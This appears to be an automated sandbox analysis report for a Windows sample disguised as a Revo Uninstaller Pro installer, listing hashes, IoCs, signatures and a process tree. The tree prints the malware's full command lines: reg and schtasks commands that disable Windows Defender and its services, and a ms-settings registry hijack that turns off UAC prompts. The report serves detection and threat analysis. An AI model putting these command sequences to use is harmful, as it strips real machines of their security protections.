Analysis
max time kernel: 143s
max time network: 41s
platform: windows7_x64
resource: win7-20220414-en
submitted: 11-05-2022 23:08

Static task: static1

Behavioral task: behavioral1
Sample: 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe
Resource: win7-20220414-en

Behavioral task: behavioral2
Sample: 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe
Resource: win10v2004-20220414-en
General
Target: 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe
Size: 21.1MB
MD5: d8d732922c11a5f9ae7abf4580ce58af
SHA1: 55f3b06b60c561a928d956bea991a4409eb50d8e
SHA256: 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b
SHA512: 2a58bef05f60c2cfc240be229a3b4abe8a1d01c3fa8361ca9ab9a58c343632efa44eccb8f9bd7657976e3d891bd52ad9f6972bd5e21897f8e153c9b3522d9e0e
Malware Config
Signatures

Modifies security service 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | reg.exe

Executes dropped EXE 8 IoCs
Processes:
pid | process
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
2008 | Revo Uninstaller Pro 4.2.3.exe
664 | Revo Uninstaller Pro 4.2.3.tmp
1484 | 7z.exe
1876 | 7z.exe
1916 | 7z.exe
1548 | 7z.exe
1732 | iMtu_gQB.exe

Loads dropped DLL 11 IoCs
Processes:
pid | process
304 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
2008 | Revo Uninstaller Pro 4.2.3.exe
888 | cmd.exe
1484 | 7z.exe
1876 | 7z.exe
1916 | 7z.exe
1548 | 7z.exe
888 | cmd.exe
1732 | iMtu_gQB.exe

Drops file in Program Files directory 2 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
File created | C:\Program Files (x86)\is-BT1IS.tmp | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Delays execution with timeout.exe 1 IoCs
Processes:
pid | process
972 | timeout.exe

Modifies registry class 7 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open\command | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute = " " | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open\command | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open | reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
pid | process
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
1732 | iMtu_gQB.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
description | pid | process
Token: SeRestorePrivilege | 1484 | 7z.exe
Token: 35 | 1484 | 7z.exe
Token: SeSecurityPrivilege | 1484 | 7z.exe
Token: SeSecurityPrivilege | 1484 | 7z.exe
Token: SeRestorePrivilege | 1876 | 7z.exe
Token: 35 | 1876 | 7z.exe
Token: SeSecurityPrivilege | 1876 | 7z.exe
Token: SeSecurityPrivilege | 1876 | 7z.exe
Token: SeRestorePrivilege | 1916 | 7z.exe
Token: 35 | 1916 | 7z.exe
Token: SeSecurityPrivilege | 1916 | 7z.exe
Token: SeSecurityPrivilege | 1916 | 7z.exe
Token: SeRestorePrivilege | 1548 | 7z.exe
Token: 35 | 1548 | 7z.exe
Token: SeSecurityPrivilege | 1548 | 7z.exe
Token: SeSecurityPrivilege | 1548 | 7z.exe
Token: SeDebugPrivilege | 1732 | iMtu_gQB.exe

Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid | process
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp

Suspicious use of WriteProcessMemory 64 IoCs
Processes:
pid | process | target pid | target process
304 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe | 1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
304 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe | 1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
304 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe | 1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
304 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe | 1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
304 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe | 1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
304 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe | 1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
304 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe | 1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp | 2008 | Revo Uninstaller Pro 4.2.3.exe
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp | 2008 | Revo Uninstaller Pro 4.2.3.exe
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp | 2008 | Revo Uninstaller Pro 4.2.3.exe
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp | 2008 | Revo Uninstaller Pro 4.2.3.exe
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp | 2008 | Revo Uninstaller Pro 4.2.3.exe
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp | 2008 | Revo Uninstaller Pro 4.2.3.exe
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp | 2008 | Revo Uninstaller Pro 4.2.3.exe
2008 | Revo Uninstaller Pro 4.2.3.exe | 664 | Revo Uninstaller Pro 4.2.3.tmp
2008 | Revo Uninstaller Pro 4.2.3.exe | 664 | Revo Uninstaller Pro 4.2.3.tmp
2008 | Revo Uninstaller Pro 4.2.3.exe | 664 | Revo Uninstaller Pro 4.2.3.tmp
2008 | Revo Uninstaller Pro 4.2.3.exe | 664 | Revo Uninstaller Pro 4.2.3.tmp
2008 | Revo Uninstaller Pro 4.2.3.exe | 664 | Revo Uninstaller Pro 4.2.3.tmp
2008 | Revo Uninstaller Pro 4.2.3.exe | 664 | Revo Uninstaller Pro 4.2.3.tmp
2008 | Revo Uninstaller Pro 4.2.3.exe | 664 | Revo Uninstaller Pro 4.2.3.tmp
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp | 1608 | WScript.exe
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp | 1608 | WScript.exe
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp | 1608 | WScript.exe
1940 | 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp | 1608 | WScript.exe
1608 | WScript.exe | 1276 | cmd.exe
1608 | WScript.exe | 1276 | cmd.exe
1608 | WScript.exe | 1276 | cmd.exe
1608 | WScript.exe | 1276 | cmd.exe
1608 | WScript.exe | 1004 | cmd.exe
1608 | WScript.exe | 1004 | cmd.exe
1608 | WScript.exe | 1004 | cmd.exe
1608 | WScript.exe | 1004 | cmd.exe
1004 | cmd.exe | 760 | reg.exe
1004 | cmd.exe | 760 | reg.exe
1004 | cmd.exe | 760 | reg.exe
1004 | cmd.exe | 760 | reg.exe
1276 | cmd.exe | 1880 | reg.exe
1276 | cmd.exe | 1880 | reg.exe
1276 | cmd.exe | 1880 | reg.exe
1276 | cmd.exe | 1880 | reg.exe
1004 | cmd.exe | 1416 | reg.exe
1004 | cmd.exe | 1416 | reg.exe
1004 | cmd.exe | 1416 | reg.exe
1004 | cmd.exe | 1416 | reg.exe
1276 | cmd.exe | 1864 | reg.exe
1276 | cmd.exe | 1864 | reg.exe
1276 | cmd.exe | 1864 | reg.exe
1276 | cmd.exe | 1864 | reg.exe
1276 | cmd.exe | 1916 | reg.exe
1276 | cmd.exe | 1916 | reg.exe
1276 | cmd.exe | 1916 | reg.exe
1276 | cmd.exe | 1916 | reg.exe
1276 | cmd.exe | 520 | reg.exe
1276 | cmd.exe | 520 | reg.exe
1276 | cmd.exe | 520 | reg.exe
1276 | cmd.exe | 520 | reg.exe
1276 | cmd.exe | 1112 | reg.exe
1276 | cmd.exe | 1112 | reg.exe
1276 | cmd.exe | 1112 | reg.exe
1276 | cmd.exe | 1112 | reg.exe
1276 | cmd.exe | 1668 | reg.exe
1276 | cmd.exe | 1668 | reg.exe
1276 | cmd.exe | 1668 | reg.exe
Processes
(process tree; depth in brackets, command line on the following line, then the signatures that fired for that process)

[1] C:\Users\Admin\AppData\Local\Temp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Local\Temp\is-IBDN6.tmp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
      command line: "C:\Users\Admin\AppData\Local\Temp\is-IBDN6.tmp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp" /SL5="$60122,21430934,788992,C:\Users\Admin\AppData\Local\Temp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory

    [3] C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
        command line: "C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

      [4] C:\Users\Admin\AppData\Local\Temp\is-DUIEU.tmp\Revo Uninstaller Pro 4.2.3.tmp
          command line: "C:\Users\Admin\AppData\Local\Temp\is-DUIEU.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$101B0,16350626,188928,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
          - Executes dropped EXE

    [3] C:\Windows\SysWOW64\WScript.exe
        command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WsrD\MMF.vbs"
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\cmd.exe
          command line: cmd /c ""C:\ProgramData\WsrD\DisableOAVProtection.bat" "
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

        [5] C:\Windows\SysWOW64\schtasks.exe
            command line: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

        [5] C:\Windows\SysWOW64\schtasks.exe
            command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

        [5] C:\Windows\SysWOW64\schtasks.exe
            command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

        [5] C:\Windows\SysWOW64\schtasks.exe
            command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

        [5] C:\Windows\SysWOW64\schtasks.exe
            command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
            - Modifies security service

        [5] C:\Windows\SysWOW64\reg.exe
            command line: reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

      [4] C:\Windows\SysWOW64\cmd.exe
          command line: cmd /c ""C:\ProgramData\WsrD\DisableUserAccountControl.bat" "
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\reg.exe
            command line: REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
            - Modifies registry class

        [5] C:\Windows\SysWOW64\reg.exe
            command line: REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
            - Modifies registry class

      [4] C:\Windows\SysWOW64\cmd.exe
          command line: cmd /c ""C:\ProgramData\WsrD\main.bat" "
          - Loads dropped DLL

        [5] C:\Windows\SysWOW64\mode.com
            command line: mode 65,10

        [5] C:\ProgramData\WsrD\7z.exe
            command line: 7z.exe e file.zip -p___________26672pwd30077pwd1546___________ -oextracted
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken

        [5] C:\ProgramData\WsrD\7z.exe
            command line: 7z.exe e extracted/file_3.zip -oextracted
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken

        [5] C:\ProgramData\WsrD\7z.exe
            command line: 7z.exe e extracted/file_2.zip -oextracted
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken

        [5] C:\ProgramData\WsrD\7z.exe
            command line: 7z.exe e extracted/file_1.zip -oextracted
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken

        [5] C:\ProgramData\WsrD\iMtu_gQB.exe
            command line: "iMtu_gQB.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\cmd.exe
          command line: cmd /c ""C:\ProgramData\WsrD\DiskRemoval.bat" "

        [5] C:\Windows\SysWOW64\timeout.exe
            command line: timeout /T 60 /NOBREAK
            - Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads